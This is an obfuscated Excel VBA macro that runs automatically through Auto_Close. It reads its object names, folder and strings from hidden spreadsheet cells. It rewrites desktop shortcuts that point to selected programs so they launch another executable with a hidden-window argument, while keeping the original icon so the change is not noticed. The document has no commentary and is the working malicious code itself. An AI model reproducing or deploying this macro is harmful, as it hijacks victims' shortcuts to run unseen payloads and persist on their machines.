Sub Auto_Close()
Set uDKPycao = CreateObject(activeSheet.Range("AQ70").value)
Set qHGZksKm = CreateObject(activeSheet.Range("AU70").value)
Set MSqyoPKs = qHGZksKm.GetFolder(uDKPycao.SpecialFolders(activeSheet.Range("AY70").value))
For Each xzkZwlBGH In MSqyoPKs.Files
If(InStr(Lcase(xzkZwlBGH), ".lnk")) Then
Set lZQuGJdvD = uDKPycao.CreateShortcut(uDKPycao.SPecialFolders(activeSheet.Range("AY70").value) & "\" & xzkZwlBGH.name)
If(InStr(Lcase(lZQuGJdvD.targetPath), activeSheet.Range("BB70").value) or InStr(Lcase(lZQuGJdvD.targetPath), activeSheet.Range("BE70").value) or InStr(Lcase(lZQuGJdvD.targetPath), activeSheet.Range("BG70").value)) Then
lZQuGJdvD.IconLocation = lZQuGJdvD.targetpath
lZQuGJdvD.arguments = "-w " & activeSheet.Range("BJ70").Value & lZQuGJdvD.targetPath & "'" & activeSheet.Range("BM70").Value
lZQuGJdvD.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BP70").value
if(Len(lZQuGJdvD.arguments) < 1023) Then
lZQuGJdvD.save
end if
end if
end if
next xzkZwlBGH
End Sub
